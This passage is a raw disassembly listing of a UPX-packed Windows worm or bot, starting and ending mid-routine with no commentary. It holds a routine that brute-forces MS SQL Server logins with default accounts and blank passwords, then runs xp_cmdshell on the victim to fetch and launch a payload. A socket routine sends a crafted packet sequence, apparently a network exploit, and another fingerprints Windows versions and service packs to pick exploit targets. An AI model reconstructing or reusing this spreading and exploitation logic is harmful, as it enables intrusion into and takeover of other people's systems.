jnz short loc_409A51
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz short loc_409A92
loc_409A51: ; CODE XREF: UPX0:00409A42�j
xor esi, esi
cmp [ebp-8], ebx
jle short loc_409A77
lea edi, [ebp-178h]
loc_409A5E: ; CODE XREF: UPX0:00409A75�j
push dword ptr [ebp+8]
push dword ptr [edi]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409A7E
inc esi
add edi, 24h
cmp esi, [ebp-8]
jl short loc_409A5E
loc_409A77: ; CODE XREF: UPX0:00409A56�j
cmp [ebp-0Ch], ebx
jz short loc_409A92
jmp short loc_409A1B
; ---------------------------------------------------------------------------
loc_409A7E: ; CODE XREF: UPX0:00409A6C�j
lea eax, [esi+esi*8]
xor ecx, ecx
cmp dword ptr [ebp+eax*4-16Ch], 4
setz cl
mov eax, ecx
jmp short loc_409A9D
; ---------------------------------------------------------------------------
loc_409A92: ; CODE XREF: UPX0:00409A4F�j
; UPX0:00409A7A�j
push dword ptr [ebp-4]
call dword_413D48 ; CloseServiceHandle
xor eax, eax
loc_409A9D: ; CODE XREF: UPX0:00409A90�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 2Ah dup(0CCh)
; ---------------------------------------------------------------------------
loc_409ACC: ; CODE XREF: UPX0:0040122B�j
push ebp
mov ebp, esp
sub esp, 0C34h
mov al, byte_413980
push ebx
mov [ebp-1], al
lea eax, [ebp-1Ch]
push esi
xor ebx, ebx
push eax
mov esi, offset aSa ; "sa"
push ebx
push 1
mov [ebp-34h], esi
mov dword ptr [ebp-30h], offset aRoot ; "root"
mov dword ptr [ebp-2Ch], offset aAdmin ; "admin"
mov [ebp-28h], ebx
mov [ebp-20h], ebx
mov [ebp-0Ch], ebx
mov [ebp-18h], ebx
call dword_413DF0
test ax, ax
jnz short loc_409B2C
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-1Ch]
call dword_413F44
test ax, ax
jz short loc_409B33
loc_409B2C: ; CODE XREF: UPX0:00409B13�j
xor eax, eax
jmp loc_409CD9
; ---------------------------------------------------------------------------
loc_409B33: ; CODE XREF: UPX0:00409B2A�j
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-1Ch]
push 2
call dword_413DF0
test ax, ax
jnz loc_409CCC
test esi, esi
push edi
mov [ebp-10h], ebx
jz loc_409CBD
lea eax, [ebp-34h]
mov edi, offset off_4116B4
mov [ebp-8], eax
loc_409B62: ; CODE XREF: UPX0:00409C62�j
cmp off_4116B4, ebx
mov [ebp-14h], ebx
jz loc_409C54
mov eax, edi
mov esi, edi
loc_409B75: ; CODE XREF: UPX0:00409BEF�j
lea ecx, [ebp-1]
push ecx
push dword ptr [eax]
mov eax, [ebp-8]
push dword ptr [eax]
lea eax, [ebp+10h]
push dword ptr [ebp+0B4h]
push eax
lea eax, [ebp-434h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call ds:dword_47B5FC ; sprintf
add esp, 1Ch
lea eax, [ebp-22h]
push ebx
push eax
lea eax, [ebp-0C34h]
push 400h
push eax
lea eax, [ebp-434h]
push eax
call sub_40C28E ; strlen
pop ecx
push eax
lea eax, [ebp-434h]
push eax
push ebx
push dword ptr [ebp-0Ch]
call dword_413EE4
cmp ax, bx
jz short loc_409BF3
cmp ax, 1
jz short loc_409BF3
push 1F4h
call ds:dword_47B4EC ; Sleep
inc dword ptr [ebp-14h]
add esi, 4
mov eax, esi
cmp [esi], ebx
jnz short loc_409B75
jmp short loc_409C54
; ---------------------------------------------------------------------------
loc_409BF3: ; CODE XREF: UPX0:00409BD2�j
; UPX0:00409BD8�j
lea eax, [ebp-18h]
push eax
push dword ptr [ebp-0Ch]
push 3
call dword_413DF0
mov eax, offset dword_4137F8
push eax
push eax
push offset dword_4138B8
push offset dword_41383C
push offset dword_4136CC
push offset dword_4136A0
lea eax, [ebp-834h]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'del z&echo op"...
push eax
call ds:dword_47B5FC ; sprintf
add esp, 20h
lea eax, [ebp-834h]
push 0FFFFFFFDh
push eax
push dword ptr [ebp-18h]
call dword_413E40
test ax, ax
jz short loc_409C67
push dword ptr [ebp-18h]
push 3
call dword_413EC4
loc_409C54: ; CODE XREF: UPX0:00409B6B�j
; UPX0:00409BF1�j
add dword ptr [ebp-8], 4
inc dword ptr [ebp-10h]
mov eax, [ebp-8]
cmp [eax], ebx
jz short loc_409CBD
jmp loc_409B62
; ---------------------------------------------------------------------------
loc_409C67: ; CODE XREF: UPX0:00409C47�j
mov eax, [ebp-14h]
push offset byte_413980
mov dword ptr [ebp-20h], 1
push off_4116B4[eax*4]
lea esi, ds:4116B4h[eax*4]
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409C96
mov esi, offset aBlank ; "(Blank)"
jmp short loc_409C98
; ---------------------------------------------------------------------------
loc_409C96: ; CODE XREF: UPX0:00409C8D�j
mov esi, [esi]
loc_409C98: ; CODE XREF: UPX0:00409C94�j
mov eax, [ebp-10h]
push esi
push dword ptr [ebp+eax*4-34h]
lea eax, [ebp+10h]
push dword ptr [ebp+0B4h]
push eax
push offset aExploitingSDSS ; "exploiting (%s):%d, %s/%s"
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_40104B
add esp, 1Ch
loc_409CBD: ; CODE XREF: UPX0:00409B51�j
; UPX0:00409C60�j
push dword ptr [ebp-0Ch]
push 2
call dword_413EC4
mov ebx, [ebp-20h]
pop edi
loc_409CCC: ; CODE XREF: UPX0:00409B45�j
push dword ptr [ebp-1Ch]
push 1
call dword_413EC4
mov eax, ebx
loc_409CD9: ; CODE XREF: UPX0:00409B2E�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
db 84h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D61 proc near ; CODE XREF: sub_4012DA�j
var_11E4 = byte ptr -11E4h
var_1054 = byte ptr -1054h
var_104B = dword ptr -104Bh
var_1038 = dword ptr -1038h
var_1034 = dword ptr -1034h
var_102A = dword ptr -102Ah
var_54 = byte ptr -54h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_8 = byte ptr 10h
arg_AC = dword ptr 0B4h
push ebp
mov ebp, esp
mov eax, 11E4h
call sub_40C3E0
push ebx
push esi
lea eax, [ebp+var_11E4]
push edi
xor edi, edi
push eax
push 2
mov [ebp+var_10], edi
call ds:dword_47B718 ; WSAStartup
test eax, eax
jnz loc_40A3A7
push 6
push 1
push 2
call dword_413F3C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_24], esi
jz loc_40A3A7
lea eax, [ebp+arg_8]
mov [ebp+var_34], 2
push eax
call dword_413EE8 ; inet_addr
push [ebp+arg_AC]
mov [ebp+var_30], eax
call dword_413E98 ; ntohs
mov [ebp+var_32], ax
lea eax, [ebp+var_34]
push 10h
push eax
push esi
call dword_413E14 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
push 89h
push offset dword_411F4C
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
mov ebx, 1000h
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 1
jl loc_40A3A0
push edi
push 0BDh
push offset dword_411FD8
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
mov eax, [ebp+var_1034]
push 2
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push offset dword_4120B8
call sub_40C2A6 ; memcpy
add esp, 0Ch
push edi
push 111h
push offset dword_412098
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
push edi
push 6Fh
push offset dword_4121AC
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
mov eax, [ebp+var_1034]
push 2
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push offset dword_41223C
call sub_40C2A6 ; memcpy
add esp, 0Ch
push edi
push 3Bh
push offset dword_41221C
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
cmp byte ptr [ebp+var_104B], 0
jnz loc_40A3A0
mov eax, [ebp+var_1038]
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_412864
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_412868
call sub_40C2A6 ; memcpy
add esp, 18h
push edi
push 5Fh
push offset dword_412848
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
cmp [ebp+var_104B], 0C0000022h
jnz short loc_409F98
mov [ebp+var_10], 1
loc_409F98: ; CODE XREF: sub_409D61+22E�j
mov eax, [ebp+var_1038]
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_412274
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_412278
call sub_40C2A6 ; memcpy
add esp, 18h
push edi
push 6Ah
push offset dword_412258
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
cmp byte ptr [ebp+var_104B], 0
jnz loc_40A3A0
mov eax, [ebp+var_102A]
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_8]
push eax
push offset dword_4122E0
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_4122E4
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_C]
push 2
push eax
push offset byte_4122ED
call sub_40C2A6 ; memcpy
add esp, 24h
push edi
push 243h
push offset dword_4122C4
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
cmp byte ptr [ebp+var_104B], 0
jnz loc_40A3A0
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_412524
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_412528
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_C]
push 2
push eax
push offset byte_412531
call sub_40C2A6 ; memcpy
add esp, 24h
push edi
push 3Fh
push offset dword_412508
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz loc_40A3A0
push edi
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle loc_40A3A0
cmp byte ptr [ebp+var_104B], 0
jnz loc_40A3A0
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_412564
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_412568
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_C]
push 2
push eax
push offset byte_412571
call sub_40C2A6 ; memcpy
mov esi, offset dword_412C70
lea edi, [ebp+var_20]
movsd
add esp, 24h
cmp byte_4138FC, 0
movsw
jz short loc_40A150
push offset dword_413818
lea eax, [ebp+var_54]
push offset dword_41139C
push eax
call ds:dword_47B5FC ; sprintf
add esp, 0Ch
jmp short loc_40A17C
; ---------------------------------------------------------------------------
loc_40A150: ; CODE XREF: sub_409D61+3D4�j
mov eax, offset sub_4010E1
test eax, eax
mov eax, offset dword_4137E8
jnz short loc_40A163
mov eax, offset dword_4136BC
loc_40A163: ; CODE XREF: sub_409D61+3FB�j
push dword_4138B0
push eax
lea eax, [ebp+var_54]
push offset dword_412C5C
push eax
call ds:dword_47B5FC ; sprintf
add esp, 10h
loc_40A17C: ; CODE XREF: sub_409D61+3ED�j
lea eax, [ebp+var_54]
push eax
call sub_40C28E ; strlen
mov esi, eax
lea eax, [ebp+var_20]
push eax
call sub_40C28E ; strlen
mov edi, ds:dword_47B5DC
lea eax, [esi+eax+106h]
push eax
mov [ebp+var_18], eax
call edi ; dword_47B5DC
mov esi, eax
push 105h
push offset loc_4128A8
push esi
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_20]
push eax
call sub_40C28E ; strlen
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [esi+0D5h]
push eax
call sub_40C2A6 ; memcpy
lea eax, [ebp+var_54]
push eax
call sub_40C28E ; strlen
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [esi+0E1h]
push eax
call sub_40C2A6 ; memcpy
push [ebp+var_18]
call sub_401131
push eax
mov [ebp+var_14], eax
call edi ; dword_47B5DC
add esp, 40h
mov edi, eax
push [ebp+var_18]
push esi
push [ebp+var_14]
push edi
call sub_4011D6
push [ebp+var_14]
push edi
push offset byte_412659
call sub_40C2A6 ; memcpy
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4012A3
add esp, 24h
dec eax
jz loc_40A3A7
dec eax
jz loc_40A32B
dec eax
jz loc_40A2D1
dec eax
jz short loc_40A2A3
dec eax
jz short loc_40A275
dec eax
push 4
jnz loc_40A32D
push offset dword_412A1C
push offset byte_4127D9
call sub_40C2A6 ; memcpy
push 4
push offset dword_412A18
push offset byte_4127DD
call sub_40C2A6 ; memcpy
push 4
push offset dword_412A14
jmp loc_40A354
; ---------------------------------------------------------------------------
loc_40A275: ; CODE XREF: sub_409D61+4DD�j
push 4
push offset dword_412A0C
push offset byte_4127D9
call sub_40C2A6 ; memcpy
push 4
push offset dword_412A08
push offset byte_4127DD
call sub_40C2A6 ; memcpy
push 4
push offset dword_412A04
jmp loc_40A354
; ---------------------------------------------------------------------------
loc_40A2A3: ; CODE XREF: sub_409D61+4DA�j
push 4
push offset dword_4129FC
push offset byte_4127D9
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129F8
push offset byte_4127DD
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129F4
jmp loc_40A354
; ---------------------------------------------------------------------------
loc_40A2D1: ; CODE XREF: sub_409D61+4D3�j
cmp [ebp+var_10], 1
push 4
jnz short loc_40A302
push offset dword_4129EC
push offset byte_4127D9
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129E8
push offset byte_4127DD
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129E4
jmp short loc_40A354
; ---------------------------------------------------------------------------
loc_40A302: ; CODE XREF: sub_409D61+576�j
push offset dword_4129CC
push offset byte_4127D9
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129C8
push offset byte_4127DD
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129C4
jmp short loc_40A354
; ---------------------------------------------------------------------------
loc_40A32B: ; CODE XREF: sub_409D61+4CC�j
push 4
loc_40A32D: ; CODE XREF: sub_409D61+4E2�j
push offset dword_4129BC
push offset byte_4127D9
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129B8
push offset byte_4127DD
call sub_40C2A6 ; memcpy
push 4
push offset dword_4129B4
loc_40A354: ; CODE XREF: sub_409D61+50F�j
; sub_409D61+53D�j ...
push offset byte_4127E5
call sub_40C2A6 ; memcpy
mov esi, [ebp+var_24]
add esp, 24h
push 0
push 2FFh
push offset dword_412548
push esi
call dword_413EF8 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40A3A0
push 0
lea eax, [ebp+var_1054]
push ebx
push eax
push esi
call dword_413EC0 ; recv
cmp eax, 0Ah
jle short loc_40A3A0
cmp byte ptr [ebp+var_104B], 0
jnz short loc_40A3A0
push 1
pop eax
jmp short loc_40A3A9
; ---------------------------------------------------------------------------
loc_40A3A0: ; CODE XREF: sub_409D61+79�j
; sub_409D61+94�j ...
push esi
call dword_413F5C ; closesocket
loc_40A3A7: ; CODE XREF: sub_409D61+26�j
; sub_409D61+40�j ...
xor eax, eax
loc_40A3A9: ; CODE XREF: sub_409D61+63D�j
pop edi
pop esi
pop ebx
leave
retn
sub_409D61 endp
; ---------------------------------------------------------------------------
db 193h dup(0CCh)
; ---------------------------------------------------------------------------
loc_40A541: ; CODE XREF: UPX0:004011AE�j
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+0Ch]
xor esi, esi
sub edi, [ebp+14h]
test edi, edi
jle short loc_40A56F
loc_40A552: ; CODE XREF: UPX0:0040A56D�j
push dword ptr [ebp+14h]
mov eax, [ebp+8]
add eax, esi
push dword ptr [ebp+10h]
push eax
call sub_40C506 ; memcmp
add esp, 0Ch
test eax, eax
jz short loc_40A575
inc esi
cmp esi, edi
jl short loc_40A552
loc_40A56F: ; CODE XREF: UPX0:0040A550�j
xor al, al
loc_40A571: ; CODE XREF: UPX0:0040A577�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40A575: ; CODE XREF: UPX0:0040A568�j
mov al, 1
jmp short loc_40A571
; ---------------------------------------------------------------------------
db 0Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A587 proc near ; CODE XREF: sub_4012A3�j
var_2610 = byte ptr -2610h
var_260F = byte ptr -260Fh
var_610 = byte ptr -610h
var_410 = byte ptr -410h
var_210 = byte ptr -210h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2610h
call sub_40C3E0
cmp [ebp+arg_4], 5
push ebx
push esi
push edi
jnz short loc_40A612
push 6
push 1
push 2
call dword_413F3C ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_40A612
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_40C294 ; memset
add esp, 0Ch
mov [ebp+var_10], 2
push 8Bh
call dword_413E98 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40114F
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_413E14 ; connect
cmp eax, edi
jz short loc_40A612
push ebx
push 48h
push offset unk_412C78
push esi
call dword_413EF8 ; send
cmp eax, edi
jnz short loc_40A619
push esi
loc_40A60C: ; CODE XREF: sub_40A587+106�j
call dword_413F5C ; closesocket
loc_40A612: ; CODE XREF: sub_40A587+14�j
; sub_40A587+2C�j ...
xor eax, eax
loc_40A614: ; CODE XREF: sub_40A587+1B9�j
; sub_40A587+239�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40A619: ; CODE XREF: sub_40A587+82�j
mov esi, 2000h
push ebx
lea eax, [ebp+var_2610]
push esi
push eax
push [ebp+arg_4]
call dword_413EC0 ; recv
cmp eax, edi
jz short loc_40A68A
push ebx
push 33h
push offset dword_412CC4
push [ebp+arg_4]
call dword_413EF8 ; send
cmp eax, edi
jz short loc_40A68A
push ebx
lea eax, [ebp+var_2610]
push esi
push eax
push [ebp+arg_4]
call dword_413EC0 ; recv
cmp eax, edi
jz short loc_40A68A
push ebx
push 4Ch
push offset dword_412CF8
push [ebp+arg_4]
call dword_413EF8 ; send
cmp eax, edi
jz short loc_40A68A
push ebx
lea eax, [ebp+var_2610]
push esi
push eax
push [ebp+arg_4]
call dword_413EC0 ; recv
cmp eax, edi
jnz short loc_40A692
loc_40A68A: ; CODE XREF: sub_40A587+AB�j
; sub_40A587+C0�j ...
push [ebp+arg_4]
jmp loc_40A60C
; ---------------------------------------------------------------------------
loc_40A692: ; CODE XREF: sub_40A587+101�j
lea esi, [eax-2]
mov [ebp+arg_0], ebx
cmp esi, ebx
jle short loc_40A6E5
lea edi, [ebp+esi+var_260F]
loc_40A6A3: ; CODE XREF: sub_40A587+15C�j
cmp [ebp+arg_0], 4
jge short loc_40A6E5
cmp [edi-1], bl
jnz short loc_40A6DF
mov eax, [ebp+arg_0]
sub eax, ebx
jz short loc_40A6CD
dec eax
jz short loc_40A6C4
dec eax
jnz short loc_40A6DC
push edi
lea eax, [ebp+var_410]
jmp short loc_40A6D4
; ---------------------------------------------------------------------------
loc_40A6C4: ; CODE XREF: sub_40A587+12F�j
push edi
lea eax, [ebp+var_210]
jmp short loc_40A6D4
; ---------------------------------------------------------------------------
loc_40A6CD: ; CODE XREF: sub_40A587+12C�j
push edi
lea eax, [ebp+var_610]
loc_40A6D4: ; CODE XREF: sub_40A587+13B�j
; sub_40A587+144�j
push eax
call sub_40C25E ; strcpy
pop ecx
pop ecx
loc_40A6DC: ; CODE XREF: sub_40A587+132�j
inc [ebp+arg_0]
loc_40A6DF: ; CODE XREF: sub_40A587+125�j
dec esi
dec edi
cmp esi, ebx
jg short loc_40A6A3
loc_40A6E5: ; CODE XREF: sub_40A587+113�j
; sub_40A587+120�j
push [ebp+arg_4]
call dword_413F5C ; closesocket
lea eax, [ebp+var_210]
push eax
push offset aWindowsServer2 ; "Windows Server 2003 *.*"
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jz short loc_40A745
lea eax, [ebp+var_410]
push eax
push offset aServicePack1 ; "*Service Pack 1*"
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jz short loc_40A723
push 5
jmp loc_40A7BF
; ---------------------------------------------------------------------------
loc_40A723: ; CODE XREF: sub_40A587+193�j
lea eax, [ebp+var_410]
push eax
push offset aServicePack2 ; "*Service Pack 2*"
call sub_4010D2
neg eax
sbb eax, eax
pop ecx
and eax, 2
pop ecx
add eax, 4
jmp loc_40A614
; ---------------------------------------------------------------------------
loc_40A745: ; CODE XREF: sub_40A587+17C�j
lea eax, [ebp+var_210]
push eax
push offset aNtLanManager_ ; "NT LAN Manager *.*"
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jz short loc_40A760
push 1
jmp short loc_40A7BF
; ---------------------------------------------------------------------------
loc_40A760: ; CODE XREF: sub_40A587+1D3�j
lea eax, [ebp+var_210]
mov esi, offset aWindows2000Lan ; "Windows 2000 LAN Manager*"
push eax
push esi
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jz short loc_40A793
lea eax, [ebp+var_410]
push eax
push offset dword_412D8C
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A793
push 2
jmp short loc_40A7BF
; ---------------------------------------------------------------------------
loc_40A793: ; CODE XREF: sub_40A587+1EF�j
; sub_40A587+206�j
lea eax, [ebp+var_210]
push eax
push esi
call sub_4010D2
pop ecx
test eax, eax
pop ecx
jz short loc_40A7C5
lea eax, [ebp+var_410]
push eax
push offset dword_412D7C
call sub_40C252 ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40A7C5
push 3
loc_40A7BF: ; CODE XREF: sub_40A587+197�j
; sub_40A587+1D7�j ...
pop eax
jmp loc_40A614
; ---------------------------------------------------------------------------
loc_40A7C5: ; CODE XREF: sub_40A587+21D�j
; sub_40A587+234�j
lea eax, [ebp+var_210]
push eax
push offset dword_412D70
call sub_4010D2
neg eax
pop ecx
sbb eax, eax
pop ecx
and eax, 7
jmp loc_40A614
sub_40A587 endp
; ---------------------------------------------------------------------------
db 97h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A87B proc near ; CODE XREF: sub_4010A0�j
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_40A981
push 10h
push 0
push offset dword_47A3B8
call sub_40C294 ; memset
push 10h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call ds:dword_47B614 ; strncpy
mov esi, ds:dword_47B5D0
mov edi, offset a_ ; "."
lea eax, [ebp+var_20]
push edi
push eax
call esi ; dword_47B5D0
add esp, 20h
mov [ebp+var_10], eax
test eax, eax
jz loc_40A981
mov [ebp+arg_0], 1
lea ebx, [ebp+var_C]
loc_40A8D5: ; CODE XREF: sub_40A87B+77�j
push edi
push 0
call esi ; dword_47B5D0
xor edx, edx
pop ecx
cmp eax, edx
pop ecx
mov [ebx], eax
jz loc_40A981
inc [ebp+arg_0]
add ebx, 4
cmp [ebp+arg_0], 4
jl short loc_40A8D5
cmp [ebp+arg_8], 1
jnz short loc_40A923
cmp [ebp+arg_4], edx
mov ecx, offset dword_412F00
mov eax, offset a0 ; "0"
mov esi, ecx
jnz short loc_40A90D
mov esi, eax
loc_40A90D: ; CODE XREF: sub_40A87B+8E�j
cmp [ebp+arg_4], edx
mov edx, ecx
jnz short loc_40A916
mov edx, eax
loc_40A916: ; CODE XREF: sub_40A87B+97�j
cmp [ebp+arg_4], 0
jz short loc_40A91E
mov eax, ecx
loc_40A91E: ; CODE XREF: sub_40A87B+9F�j
push esi
push edx
push eax
jmp short loc_40A964
; ---------------------------------------------------------------------------
loc_40A923: ; CODE XREF: sub_40A87B+7D�j
cmp [ebp+arg_8], 2
jnz short loc_40A948
cmp [ebp+arg_4], edx
mov ecx, offset dword_412F00
mov eax, offset a0 ; "0"
mov edx, ecx
jnz short loc_40A93C
mov edx, eax
loc_40A93C: ; CODE XREF: sub_40A87B+BD�j
cmp [ebp+arg_4], 0
jz short loc_40A944
mov eax, ecx
loc_40A944: ; CODE XREF: sub_40A87B+C5�j
push edx
push eax
jmp short loc_40A961
; ---------------------------------------------------------------------------
loc_40A948: ; CODE XREF: sub_40A87B+AC�j
cmp [ebp+arg_8], 3
jnz short loc_40A981
cmp [ebp+arg_4], edx
mov eax, offset dword_412F00
jnz short loc_40A95D
mov eax, offset a0 ; "0"
loc_40A95D: ; CODE XREF: sub_40A87B+DB�j
push eax
push [ebp+var_8]
loc_40A961: ; CODE XREF: sub_40A87B+CB�j
push [ebp+var_C]
loc_40A964: ; CODE XREF: sub_40A87B+A6�j
push [ebp+var_10]
push offset dword_412EF0
push offset dword_47A3B8
call ds:dword_47B5FC ; sprintf
add esp, 18h
mov eax, offset dword_47A3B8
jmp short loc_40A983
; ---------------------------------------------------------------------------
loc_40A981: ; CODE XREF: sub_40A87B+D�j
; sub_40A87B+4A�j ...
xor eax, eax
loc_40A983: ; CODE XREF: sub_40A87B+104�j
pop edi
pop esi
pop ebx
leave
retn
sub_40A87B endp
; ---------------------------------------------------------------------------
db 43h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CB proc near ; CODE XREF: sub_4010F5�j
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_AC = dword ptr 0B4h
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_AC]
push esi
cmp eax, 0FFFFFFFFh
jz loc_40AAB4
imul eax, 3Ch
xor esi, esi
cmp dword_412E50[eax], esi
jz loc_40AAB4
push 5
call sub_4010AF
test eax, eax
pop ecx
jnz loc_40AAB4
push esi
mov ds:dword_47A2E4, esi
call ds:dword_47B594 ; time
push eax
call ds:dword_47B5F8 ; srand
call ds:dword_47B5EC ; rand
cdq
mov ecx, 0FC17h
push 7Fh
idiv ecx
lea eax, [ebp+arg_10]
mov ds:dword_47A3B0, esi
push eax
push offset dword_47A2EC
add edx, 4B0h
mov dword_4138B0, edx
mov ds:dword_47A2E8, edx
call ds:dword_47B614 ; strncpy
push ds:dword_47A2E8
mov eax, [ebp+arg_CC]
mov ds:dword_47A3B4, eax
push offset dword_4137E8
push offset dword_412F04
push 5
call sub_401073
add esp, 24h
mov ds:dword_47A2E0, eax
lea eax, [ebp+var_4]
push eax
push esi
push offset dword_47A2E0
push offset sub_4011F9
push esi
push esi
call ds:dword_47B4DC ; CreateThread
mov ecx, ds:dword_47A2E0
imul ecx, 220h
cmp eax, esi
mov dword_427630[ecx], eax
jz short loc_40AAB4
loc_40AAA2: ; CODE XREF: sub_40A9CB+E7�j
cmp ds:dword_47A3B0, esi
jnz short loc_40AAB4
push 32h
call ds:dword_47B4EC ; Sleep
jmp short loc_40AAA2
; ---------------------------------------------------------------------------
loc_40AAB4: ; CODE XREF: sub_40A9CB+E�j
; sub_40A9CB+1F�j ...
pop esi
leave
retn
sub_40A9CB endp
; ---------------------------------------------------------------------------
db 3Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AAF2 proc near ; CODE XREF: sub_40127B�j
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4792C8h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_40C2A6 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call dword_413D8C ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_413E94 ; ntohl
mov [ebp+arg_0], eax
